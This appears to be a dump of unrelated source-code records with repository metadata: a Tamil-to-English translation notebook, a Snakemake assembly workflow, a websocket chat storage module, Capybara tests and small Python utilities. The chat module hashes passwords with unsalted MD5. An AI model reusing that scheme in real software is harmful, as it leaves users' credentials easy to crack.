"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"389fd8956d6d4747ba71d510f19b1d1c": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"bb7153ca8bdd4c7293f20a8373b8156b": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
}
}
}
},
"cells": [
{
"cell_type": "markdown",
"metadata": {
"id": "view-in-github",
"colab_type": "text"
},
"source": [
"<a href=\"https://colab.research.google.com/github/samyuktha-12/Aug2021-contest/blob/main/final.py\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>"
]
},
{
"cell_type": "code",
"metadata": {
"colab": {
"base_uri": "https://localhost:8080/"
},
"id": "eiR1x34Spo8W",
"outputId": "f2f04ad1-f77b-4942-8ff2-b9dbd14a802a"
},
"source": [
"pip install easynmt"
],
"execution_count": 1,
"outputs": [
{
"output_type": "stream",
"text": [
"Collecting easynmt\n",
" Downloading EasyNMT-2.0.1.tar.gz (14 kB)\n",
"Requirement already satisfied: tqdm in /usr/local/lib/python3.7/dist-packages (from easynmt) (4.62.0)\n",
"Collecting transformers<5,>=4.4\n",
" Downloading transformers-4.9.2-py3-none-any.whl (2.6 MB)\n",
"\u001b[K |████████████████████████████████| 2.6 MB 11.6 MB/s \n",
"\u001b[?25hRequirement already satisfied: torch>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from easynmt) (1.9.0+cu102)\n",
"Requirement already satisfied: numpy in /usr/local/lib/python3.7/dist-packages (from easynmt) (1.19.5)\n",
"Requirement already satisfied: nltk in /usr/local/lib/python3.7/dist-packages (from easynmt) (3.2.5)\n",
"Collecting sentencepiece\n",
" Downloading sentencepiece-0.1.96-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (1.2 MB)\n",
"\u001b[K |████████████████████████████████| 1.2 MB 34.5 MB/s \n",
"\u001b[?25hCollecting fasttext\n",
" Downloading fasttext-0.9.2.tar.gz (68 kB)\n",
"\u001b[K |████████████████████████████████| 68 kB 6.7 MB/s \n",
"\u001b[?25hRequirement already satisfied: typing-extensions in /usr/local/lib/python3.7/dist-packages (from torch>=1.6.0->easynmt) (3.7.4.3)\n",
"Collecting sacremoses\n",
" Downloading sacremoses-0.0.45-py3-none-any.whl (895 kB)\n",
"\u001b[K |████████████████████████████████| 895 kB 48.6 MB/s \n",
"\u001b[?25hRequirement already satisfied: filelock in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (3.0.12)\n",
"Requirement already satisfied: regex!=2019.12.17 in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (2019.12.20)\n",
"Collecting pyyaml>=5.1\n",
" Downloading PyYAML-5.4.1-cp37-cp37m-manylinux1_x86_64.whl (636 kB)\n",
"\u001b[K |████████████████████████████████| 636 kB 51.9 MB/s \n",
"\u001b[?25hCollecting tokenizers<0.11,>=0.10.1\n",
" Downloading tokenizers-0.10.3-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl (3.3 MB)\n",
"\u001b[K |████████████████████████████████| 3.3 MB 39.7 MB/s \n",
"\u001b[?25hRequirement already satisfied: requests in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (2.23.0)\n",
"Collecting huggingface-hub==0.0.12\n",
" Downloading huggingface_hub-0.0.12-py3-none-any.whl (37 kB)\n",
"Requirement already satisfied: packaging in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (21.0)\n",
"Requirement already satisfied: importlib-metadata in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (4.6.4)\n",
"Requirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging->transformers<5,>=4.4->easynmt) (2.4.7)\n",
"Collecting pybind11>=2.2\n",
" Using cached pybind11-2.7.1-py2.py3-none-any.whl (200 kB)\n",
"Requirement already satisfied: setuptools>=0.7.0 in /usr/local/lib/python3.7/dist-packages (from fasttext->easynmt) (57.4.0)\n",
"Requirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.7/dist-packages (from importlib-metadata->transformers<5,>=4.4->easynmt) (3.5.0)\n",
"Requirement already satisfied: six in /usr/local/lib/python3.7/dist-packages (from nltk->easynmt) (1.15.0)\n",
"Requirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests->transformers<5,>=4.4->easynmt) (2021.5.30)\n",
"Requirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests->transformers<5,>=4.4->easynmt) (1.24.3)\n",
"Requirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests->transformers<5,>=4.4->easynmt) (2.10)\n",
"Requirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests->transformers<5,>=4.4->easynmt) (3.0.4)\n",
"Requirement already satisfied: click in /usr/local/lib/python3.7/dist-packages (from sacremoses->transformers<5,>=4.4->easynmt) (7.1.2)\n",
"Requirement already satisfied: joblib in /usr/local/lib/python3.7/dist-packages (from sacremoses->transformers<5,>=4.4->easynmt) (1.0.1)\n",
"Building wheels for collected packages: easynmt, fasttext\n",
" Building wheel for easynmt (setup.py) ... \u001b[?25l\u001b[?25hdone\n",
" Created wheel for easynmt: filename=EasyNMT-2.0.1-py3-none-any.whl size=15446 sha256=504bb20229ab8caf87c5e681e2c8e9e23fb370a1b99cb45b14c839e7ed4eae8f\n",
" Stored in directory: /root/.cache/pip/wheels/fb/42/fb/b7711d3296456d5f74e6e265dbdb0e3142158f1bb50382caef\n",
" Building wheel for fasttext (setup.py) ... \u001b[?25l\u001b[?25hdone\n",
" Created wheel for fasttext: filename=fasttext-0.9.2-cp37-cp37m-linux_x86_64.whl size=3095031 sha256=a6597590785eb05f6b4e70fe03ceddb5edec6ccfd12ad4c0b9abf3ae455c1f3e\n",
" Stored in directory: /root/.cache/pip/wheels/4e/ca/bf/b020d2be95f7641801a6597a29c8f4f19e38f9c02a345bab9b\n",
"Successfully built easynmt fasttext\n",
"Installing collected packages: tokenizers, sacremoses, pyyaml, pybind11, huggingface-hub, transformers, sentencepiece, fasttext, easynmt\n",
" Attempting uninstall: pyyaml\n",
" Found existing installation: PyYAML 3.13\n",
" Uninstalling PyYAML-3.13:\n",
" Successfully uninstalled PyYAML-3.13\n",
"Successfully installed easynmt-2.0.1 fasttext-0.9.2 huggingface-hub-0.0.12 pybind11-2.7.1 pyyaml-5.4.1 sacremoses-0.0.45 sentencepiece-0.1.96 tokenizers-0.10.3 transformers-4.9.2\n"
],
"name": "stdout"
}
]
},
{
"cell_type": "code",
"metadata": {
"id": "UdsEN49Dp9Bj",
"colab": {
"base_uri": "https://localhost:8080/",
"height": 194,
"referenced_widgets": [
"6389fd3f3dc44050a610f69ab5e6a180",
"e86b2bbb520d4af990e84769814bbea5",
"42cacbc4410c4cd5861b324e9122fff7",
"ee6e111cae584dccb59e4a18fe5996e9",
"a64dcbd7f61c48dfa7d6fdd68d8c1758",
"8cd6b59399bb4f6b9419273713208fe2",
"11b917db556441efb01f932916060f0b",
"ef5d24a03aca43a1ae8a12e60a6149f0",
"156c24ba6f3c40a8aa7cbe915e1c5ed5",
"0a80dd64f7454aad8e249a57f13b7cf5",
"6408458000104746a888b5b7d1bb3992",
"d13dbb8559ba40a9a2f9dc7f0f5ea40d",
"f51970b3c1c549a69c51de95909e2105",
"6f57dcc2e6514dc593020a36a812dd2d",
"18975982ec1e4de8b4f0c665364926ba",
"7fbfeabe51a14620a520cb5cbba15945",
"dead2cfeeb9541e6b63a3e17327b8b85",
"6091e5ed880b4342aeee6fab8ee77dad",
"730d7b36b5254c1a9a6e97d429f7c083",
"d41435a1cc8d49119664466716ac5a9c",
"5ddb070811d04b2891ffaaaff381cc1c",
"609284e60209444fb1a86f5d803d16b1",
"d8ddbf1f4d33471cbb4a45f2a82c830e",
"0ded282a4598481db2831db11c45cc06",
"0e98a3fb81be4eb7be56f6c54f3453eb",
"1ad806b735cb4b7b83b63dfff1009cb1",
"877fdb214729497c8756a82ff97208f2",
"17dea81fe42a4d31b5239dec9cfbf446",
"6583cc2d5bb0439e8c3d6f4d607dfb7e",
"a8bc0bade21b4715a5dc62594a16d0c9",
"6e9b9d7ca93540bba92c33b4fd9f295e",
"3cc33b5d60f641d5bc81eb6f60bfcd1e",
"847c55b3901f4601803dd31828cffc93",
"3b558d4bff2241ad949cfe4b27000ff8",
"8488584c8f814eb88197cbcf5eaf8487",
"29ca8786126e4e9b897de5426ec009a9",
"fde487b2fd4b4095991e408a24e81042",
"fe982e314fba4aad95092dd54983f300",
"33f2761b5013498e8333785833ea668d",
"040fc5c9d53746928e21663d44ee5187",
"3ee1821930ce4279a28c771ae06d0acf",
"be27dd7477bc45c1a98fb723a236937b",
"b4f4ec01371442d3a50a552e5ed2cff2",
"0a4bb6df135e42148a838620d7ac36be",
"1b3b94e8b9f1485f920956b3d80a187c",
"af8d9db3bf404a29975ce2dc0dfcfb4f",
"87d6049157324e878cac7021fbf6e218",
"e3420824fef140b1b45da3823e167cd9",
"41dbf83a749346738f8a671e196e5a1e",
"32feb77b17fb4c75a4b93ab17972872e",
"289662f6aa6946f08613ce07855e9b8d",
"389acd5078e64ed592145f344da8fc98",
"34c6f99ff0854c4da84e56c03acceebf",
"389fd8956d6d4747ba71d510f19b1d1c",
"bb7153ca8bdd4c7293f20a8373b8156b"
]
},
"outputId": "6cd9ab41-fbda-4e02-bf46-cf887f2eaae3"
},
"source": [
"from easynmt import EasyNMT\n",
"model = EasyNMT('mbart50_m2m')"
],
"execution_count": 2,
"outputs": [
{
"output_type": "stream",
"text": [
"100%|██████████| 24.9k/24.9k [00:00<00:00, 1.07MB/s]\n"
],
"name": "stderr"
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "6389fd3f3dc44050a610f69ab5e6a180",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/1.43k [00:00<?, ?B/s]"
]
},
"metadata": {}
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "d13dbb8559ba40a9a2f9dc7f0f5ea40d",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/2.44G [00:00<?, ?B/s]"
]
},
"metadata": {}
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "d8ddbf1f4d33471cbb4a45f2a82c830e",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/529 [00:00<?, ?B/s]"
]
},
"metadata": {}
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "3b558d4bff2241ad949cfe4b27000ff8",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/5.07M [00:00<?, ?B/s]"
]
},
"metadata": {}
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "1b3b94e8b9f1485f920956b3d80a187c",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/649 [00:00<?, ?B/s]"
]
},
"metadata": {}
}
]
},
{
"cell_type": "code",
"metadata": {
"id": "_uAO2hKO7a_r"
},
"source": [
"#create a folder tamil_files\n",
"for ind in range(22,32):\n",
" tamil_open = open(f\"/content/tamil_files/{ind} - tam.txt\",'r')\n",
"\n",
" t_read = tamil_open.readlines()\n",
" ta_sent=[]\n",
" for i in range(len(t_read)):\n",
" if t_read[i]!='\\n':\n",
" ta_sent.append(t_read[i].rstrip(\"\\n\"))\n",
" \n",
" max_len_split=[]\n",
" translate=[]\n",
" for i in range(len(ta_sent)):\n",
" k=ta_sent[i]\n",
" if len(k)<723:\n",
" translate.append(model.translate(k,target_lang='en'))\n",
" if len(k)>=723:\n",
" k=k.split()\n",
" max_len_split.append(''.join(k[:len(k)//2]))\n",
" max_len_split.append(''.join(k[len(k)//2:len(k)]))\n",
" ttemp=((model.translate(k,target_lang='en')))\n",
" stemp=' '.join(ttemp)\n",
" translate.append([stemp])\n",
"\n",
"#create a folder called translate\n",
"\n",
" write_file = open(f\"/content/translate/{ind} - translate.txt\",'w')\n",
"\n",
" for i in translate:\n",
" write_file.writelines(i)\n",
" write_file.write('\\n\\n')\n",
"\n",
" write_file.close()\n",
" tamil_open.close()"
],
"execution_count": 4,
"outputs": []
}
]
} | [
"74132439+samyuktha-12@users.noreply.github.com"
] | 74132439+samyuktha-12@users.noreply.github.com |
db8fb812de665a15d02b129767215fa3ad919be0 | 24bb9b9f4bf8e18bd11b8f12f0aab1883b7e3e22 | /Snakefile | 9e789f1c7d8395a15ae7013336c1c4f11e3af039 | [] | no_license | xyloforce/snakemake_workshop | 2b2dcf05ea65e969bf6168a46a7e60bbb3749b4e | 213d6d7b0da3916a2de28b654a14553e4bf9d1c3 | refs/heads/master | 2022-12-15T11:42:09.877347 | 2020-09-04T09:21:59 | 2020-09-04T09:21:59 | 292,662,135 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | configfile: "config.yaml"
rule quality_fastq:
input:
R1 = config["fastq_path"] + "{sample}_R1_001.fastq.gz",
R2 = config["fastq_path"] + "{sample}_R2_001.fastq.gz"
output:
"{sample}_qc_report.pdf"
params:
faqcs = config["faqcs"],
prefix = lambda wildcards: wildcards.sample
shell:
"{params.faqcs} -1 {input.R1} -2 {input.R2} --prefix {params.prefix} -d ."
rule assembly:
conda:
"envs/spades.yaml"
input:
R1 = config["fastq_path"] + "{sample}_R1_001.fastq.gz",
R2 = config["fastq_path"] + "{sample}_R2_001.fastq.gz"
output:
"{sample}.fasta"
params:
prefix = lambda wildcards: wildcards.sample
log: "spades_{sample}.log"
threads: 6
shell:
"""
spades.py -o . -1 {input.R1} -2 {input.R2} > {log}
mv scaffolds.fasta {params.prefix}.fasta
"""
rule quality_assembly:
conda:
"envs/quast.yaml"
input:
genome = "{sample}.fasta",
reference = config["reference_genome"]
output:
"{sample}.assembly_report.pdf"
params:
prefix = lambda wildcards: wildcards.sample
shell:
"""
quast -o . {input.genome} -r {input.reference}
mv report.pdf {output}
"""
| [
"fabsassolas@outlook.fr"
] | fabsassolas@outlook.fr | |
043da33cdda73167b31521deaecb55c86c6631fe | 7eb4e06c98073a19e655bcc915976d19ab4c1ea5 | /guvi2.py | e214de7fb022a38c91b0dd0555c10aeb0a6ac079 | [] | no_license | nagayugeshgb/Guvi | 1ad98ab2cc9e2a55eb3fb7199e93210d8b8aa920 | 88e37812379dd947d25f36c74a5eb50f35675019 | refs/heads/master | 2020-06-21T02:50:58.650718 | 2019-11-18T05:46:54 | 2019-11-18T05:46:54 | 197,326,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | a=int(input("enter the number"))
if(a>0):
if(a%2==0):
print("Even")
else:
print("Odd")
else:
print("invalid")
| [
"noreply@github.com"
] | nagayugeshgb.noreply@github.com |
878cd2a98f34b3076bd8c65af2579105dc54b38c | d737a0c3a9bf6ddcf99ad1e226f1ee7c81bfd238 | /tests/get_manually_entities.py | 2a1672a9fe009030506cf7e0a12a2ef0542d1d8d | [
"MIT"
] | permissive | deniz195/barely-db | 714ad32c70fe129d2ea74c300aca458e972c84f5 | 984b5098ad92c2bbe6af0b9d44a73ce431b59c7e | refs/heads/master | 2023-03-03T17:32:47.630807 | 2020-08-22T14:32:11 | 2020-08-22T14:32:11 | 262,839,090 | 0 | 0 | MIT | 2020-07-10T11:17:12 | 2020-05-10T17:25:04 | HTML | UTF-8 | Python | false | false | 1,214 | py | import os
from pathlib import Path
def _get_all_entity_name(path):
path_of_headfolders = [f.path for f in os.scandir(path) if f.is_dir()]
all_pairs = dict()
for head_folder in path_of_headfolders:
if os.path.basename(head_folder) != '__code':
sub_names = [f.name for f in os.scandir(head_folder) if f.is_dir()]
sub_paths = [f.path for f in os.scandir(head_folder) if f.is_dir()]
pairs = dict(zip(sub_names, sub_paths))
all_pairs.update(pairs)
return list(all_pairs.keys())
def _get_all_entity_paths(path):
path_of_headfolders = [f.path for f in os.scandir(path) if f.is_dir()]
all_pairs = dict()
for head_folder in path_of_headfolders:
if os.path.basename(head_folder) != '__code':
sub_names = [f.name for f in os.scandir(head_folder) if f.is_dir()]
sub_paths = [f.path for f in os.scandir(head_folder) if f.is_dir()]
pairs = dict(zip(sub_names, sub_paths))
all_pairs.update(pairs)
return list(all_pairs.values())
def get_all_entity(path, mode):
if mode == 'name':
return _get_all_entity_name(path)
else:
return _get_all_entity_paths(path)
| [
"lciernik@battrion.com"
] | lciernik@battrion.com |
4c8c35cbfea397675fc14fa36df73ea858689f95 | ea3753f008a3fd4739d150879fba749f7c6d8807 | /wschat/db.py | ab2a3539e01493f021aa139f28833e1a23b3fe2b | [] | no_license | PavelBass/wschat | b7da9a1fcd4b7831b0a5573f6347d199c8b5284e | c5232f0afd21187b46df46d3a75a8d9c6a46f473 | refs/heads/master | 2021-01-10T16:02:31.470056 | 2015-05-24T21:51:31 | 2015-05-24T21:51:31 | 36,147,953 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,340 | py | import hashlib
import collections
import json
from abc import ABCMeta, abstractmethod, abstractproperty
try:
import redis
except ImportError:
redis = None
UserRecord = collections.namedtuple('UserRecord', "pass_hash allowed_rooms current_rooms")
class DB(object):
__metaclass__ = ABCMeta
_default_rooms = ('Free Chat', 'Python Developers', 'JavaScript Developers')
_default_room = _default_rooms[0]
@abstractmethod
def is_correct_user(self, login, password):
""" Check if passed login is in base and password is correct
:param login: passed login
:param password: passed password (not hash)
:return:
None: if login not in database
True: if login in database and password is correct
False: if login in database but password is not correct
"""
pass
@abstractmethod
def get_current_rooms(self, login):
""" Return current rooms of user
:param login: user login
:return: list/tuple of current rooms
"""
pass
@abstractmethod
def add_room_to_current(self, login, room):
""" Add room to current rooms for user
and rewrite his record in DataBase
:param login: user login
:param room: new room
"""
pass
@abstractmethod
def remove_room_from_current(self, login, room):
""" Remove room from current rooms for user
and rewrite his record in DataBase
:param login: user login
:param room: room name to remove
"""
pass
@abstractmethod
def get_room_history(self, room):
""" Return room history (if room exists)
:param room: room name
:return:
None: if room doesn't exists
list: last 10 messages in room
"""
pass
@abstractmethod
def change_nick_in_room(self, login, room, nick):
""" Change nick of user with received login in room
:param login: user login
:param room: room name
:param nick: new nick
"""
pass
@abstractmethod
def get_current_nick(self, login, room):
""" Return stored nickname of user for room
:param login: user login
:param room: room name
:return: nickname
"""
pass
@abstractmethod
def new_user(self, login, password):
""" Create new user
:param login: passed login
:param password: passed password
:return:
None: if user already exists
list: default allowed rooms
"""
pass
@abstractmethod
def new_room(self, room):
""" Create new room
:param room: room name
:return:
False: if such room already exists
True: after creation
"""
pass
@abstractmethod
def new_message(self, room, mess):
""" Save new message into room history
:param room: room name
:param mess: message
:return: None
"""
pass
@abstractproperty
def all_rooms(self):
""" Return all existent rooms
:return: list/tuple of rooms
"""
pass
@property
def default_room(self):
return self._default_room
@property
def default_rooms(self):
return self._default_rooms
class DBPython(DB):
def __init__(self):
self._users = dict()
self._rooms = dict()
for room in self.default_rooms:
self._rooms[room] = list()
def is_correct_user(self, login, password):
user = self._users.get(login, None)
if user is None:
return
return hashlib.md5(password).hexdigest() == user.pass_hash
def get_current_rooms(self, login):
rooms = (self.default_room,)
if login in self._users:
rooms = self._users[login].current_rooms
rooms = (x[0] for x in rooms)
return rooms
def add_room_to_current(self, login, room):
if login is None or room in self.get_current_rooms(login):
return
user = self._users[login]
rooms = list(user.current_rooms)
rooms.append((room, login,))
self._users[login] = UserRecord(user.pass_hash, user.allowed_rooms, tuple(rooms))
def remove_room_from_current(self, login, room):
user = self._users[login]
rooms = list(user.current_rooms)
for n, _room in enumerate(rooms[:]):
if room == _room[0]:
rooms.pop(n)
break
self._users[login] = UserRecord(user.pass_hash, user.allowed_rooms, tuple(rooms))
def get_room_history(self, room):
history = self._rooms.get(room, None)
if history is not None:
history = history[-10:]
return history
def change_nick_in_room(self, login, room, nick):
if login is None:
return
user = self._users[login]
rooms = list(user.current_rooms)
for _room in rooms[:]:
if room == _room[0]:
rooms[rooms.index(_room)] = (room, nick,)
self._users[login] = UserRecord(user.pass_hash, user.allowed_rooms, tuple(rooms))
def get_current_nick(self, login, room):
if login is None:
return 'Anonymous'
user = self._users[login]
rooms = list(user.current_rooms)
for _room in rooms[:]:
if room == _room[0]:
return _room[1]
def new_user(self, login, password):
if login in self._users:
return
allowed_rooms = (self.default_room,)
self._users[login] = UserRecord(hashlib.md5(password).hexdigest(), allowed_rooms, tuple())
return allowed_rooms
def new_room(self, room):
if room in self._rooms:
return False
self._rooms[room] = list()
return True
def new_message(self, room, mess):
self._rooms[room].append(mess)
@property
def all_rooms(self):
return self._rooms.keys()
class DBRedis(DB):
def __init__(self):
self.r = redis.Redis()
self._pre = 'RamblerTaskChat:'
for room in self.default_rooms:
key = '%sROOM:%s' % (self._pre, room)
if not self.r.exists(key):
self.r.lpush(key, 'Created room "%s"' % room)
def is_correct_user(self, login, password):
key = '%sUSER:%s' % (self.pre, login)
pass_hash = self.r.hget(key, 'pass_hash')
if pass_hash is None:
return
return hashlib.md5(password).hexdigest() == pass_hash
def get_current_rooms(self, login):
key = '%sUSER:%s' % (self.pre, login)
rooms = self.r.hget(key, 'current_rooms')
rooms = json.loads(rooms)
return (x[0] for x in rooms)
def add_room_to_current(self, login, room):
if login is None or room in self.get_current_rooms(login):
return
key = '%sUSER:%s' % (self.pre, login)
rooms = self.r.hget(key, 'current_rooms')
rooms = json.loads(rooms)
rooms.append((room, login,))
self.r.hset(key, 'current_rooms', json.dumps(rooms))
def remove_room_from_current(self, login, room):
key = '%sUSER:%s' % (self.pre, login)
rooms = self.r.hget(key, 'current_rooms')
rooms = json.loads(rooms)
for n, _room in enumerate(rooms[:]):
if room == _room[0]:
rooms.pop(n)
break
self.r.hset(key, 'current_rooms', json.dumps(rooms))
def get_room_history(self, room):
key = '%sROOM:%s' % (self._pre, room)
return self.r.lrange(key, -10, -1)
def change_nick_in_room(self, login, room, nick):
key = '%sUSER:%s' % (self.pre, login)
rooms = self.r.hget(key, 'current_rooms')
rooms = json.loads(rooms)
for _room in rooms[:]:
if room == _room[0]:
rooms[rooms.index(_room)] = (room, nick,)
self.r.hset(key, 'current_rooms', json.dumps(rooms))
def get_current_nick(self, login, room):
if login is None:
return 'Anonymous'
key = '%sUSER:%s' % (self.pre, login)
rooms = self.r.hget(key, 'current_rooms')
rooms = json.loads(rooms)
for _room in rooms[:]:
if room == _room[0]:
return _room[1]
def new_user(self, login, password):
key = '%sUSER:%s' % (self.pre, login)
if self.r.exists(key):
return
allowed_rooms = [self.default_room]
vals = dict(
pass_hash=hashlib.md5(password).hexdigest(),
allowed_rooms=json.dumps(allowed_rooms),
current_rooms='[]'
)
self.r.hmset(key, vals)
return allowed_rooms
def new_room(self, room):
key = '%sROOM:%s' % (self._pre, room)
if self.r.exists(key):
return False
return True
def new_message(self, room, mess):
key = '%sROOM:%s' % (self._pre, room)
self.r.rpush(key, mess)
@property
def all_rooms(self):
key = '%sROOM:*' % self._pre
rooms = self.r.keys(key)
l = len(key) - 1
return [x[l:] for x in rooms]
@property
def pre(self):
return self._pre
| [
"statgg@gmail.com"
] | statgg@gmail.com |
7918ac56d5849d5397eee17e699ba9a45cf94e5f | b2c896ca9f2acb81115708ce6cf8d01396e71a18 | /capybara/tests/session/element/test_matches_selector.py | ff60142d44cd19b211832859a9ff8d2200284aea | [
"MIT"
] | permissive | elliterate/capybara.py | b846f3cb1a712a120361849b378d437775c2c6db | eafd9ac50d02e8b57ef90d767493c8fa2be0739a | refs/heads/master | 2023-08-16T13:56:51.506840 | 2022-01-16T18:04:22 | 2022-01-16T18:04:22 | 64,620,050 | 63 | 22 | MIT | 2022-01-16T18:04:23 | 2016-07-31T23:02:18 | Python | UTF-8 | Python | false | false | 3,002 | py | import pytest
import capybara
class MatchesSelectorTestCase:
@pytest.fixture(autouse=True)
def setup_session(self, session):
session.visit("/with_html")
@pytest.fixture
def element(self, session):
return session.find("//span", text="42")
class TestMatchesSelector(MatchesSelectorTestCase):
def test_is_true_if_the_element_matches_the_given_selector(self, element):
assert element.matches_selector("xpath", "//span") is True
assert element.matches_selector("css", "span.number") is True
def test_is_false_if_the_element_does_not_match_the_given_selector(self, element):
assert element.matches_selector("xpath", "//div") is False
assert element.matches_selector("css", "span.not_a_number") is False
def test_uses_default_selector(self, element):
capybara.default_selector = "css"
assert not element.matches_selector("span.not_a_number")
assert element.matches_selector("span.number")
def test_works_with_elements_located_via_a_sibling_selector(self, element):
sibling = element.sibling("css", "span", text="Other span")
assert sibling.matches_selector("xpath", "//span")
assert sibling.matches_selector("css", "span")
def test_works_with_the_html_element(self, session):
html = session.find("/html")
assert html.matches_selector("css", "html")
def test_discards_all_matches_where_the_given_string_is_not_contained(self, element):
assert element.matches_selector("//span", text="42")
assert not element.matches_selector("//span", text="Doesnotexist")
class TestNotMatchSelector(MatchesSelectorTestCase):
def test_is_false_if_the_element_matches_the_given_selector(self, element):
assert element.not_match_selector("xpath", "//span") is False
assert element.not_match_selector("css", "span.number") is False
def test_is_true_if_the_element_does_not_match_the_given_selector(self, element):
assert element.not_match_selector("xpath", "//div") is True
assert element.not_match_selector("css", "span.not_a_number") is True
def test_uses_default_selector(self, element):
capybara.default_selector = "css"
assert element.not_match_selector("span.not_a_number")
assert not element.not_match_selector("span.number")
def test_works_with_elements_located_via_a_sibling_selector(self, element):
sibling = element.sibling("css", "span", text="Other span")
assert not sibling.not_match_selector("xpath", "//span")
assert sibling.not_match_selector("css", "div")
def test_works_with_the_html_element(self, session):
html = session.find("/html")
assert html.not_match_selector("css", "body")
def test_discards_all_matches_where_the_given_string_is_contained(self, element):
assert not element.not_match_selector("//span", text="42")
assert element.not_match_selector("//span", text="Doesnotexist")
| [
"ian@elliterate.com"
] | ian@elliterate.com |
c950a17588136d90139e61d8b1f7be25e8996ea6 | 389138ce8d651f9409f1e51526bdb02cc078fc9d | /taskipy/task.py | c357b98027ffd7230b5764ba2844394d61615d73 | [
"MIT"
] | permissive | emann/taskipy | cfc230d07c8378d8c6d5617ae56f0ffc6b7062cd | a57618590b3ad3be25f10890efbaf60d5b5cb27b | refs/heads/master | 2023-04-27T23:08:40.671322 | 2021-05-16T19:13:31 | 2021-05-16T19:13:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,516 | py | from taskipy.exceptions import MalformedTaskError
class Task:
def __init__(self, task_name: str, task_toml_contents: object):
self.__task_name = task_name
self.__task_command = self.__extract_task_command(task_toml_contents)
self.__task_description = self.__extract_task_description(task_toml_contents)
@property
def name(self):
return self.__task_name
@property
def command(self):
return self.__task_command
@property
def description(self):
return self.__task_description
def __extract_task_command(self, task_toml_contents: object) -> str:
if isinstance(task_toml_contents, str):
return task_toml_contents
if isinstance(task_toml_contents, dict):
try:
return task_toml_contents['cmd']
except KeyError:
raise MalformedTaskError(self.__task_name, 'the task item does not have the "cmd" property')
raise MalformedTaskError(self.__task_name, 'tasks must be strings, or dicts that contain { cmd, help }')
def __extract_task_description(self, task_toml_contents: object) -> str:
if isinstance(task_toml_contents, str):
return ''
if isinstance(task_toml_contents, dict):
try:
return task_toml_contents['help']
except KeyError:
return ''
raise MalformedTaskError(self.__task_name, 'tasks must be strings, or dicts that contain { cmd, help }')
| [
"noreply@github.com"
] | emann.noreply@github.com |
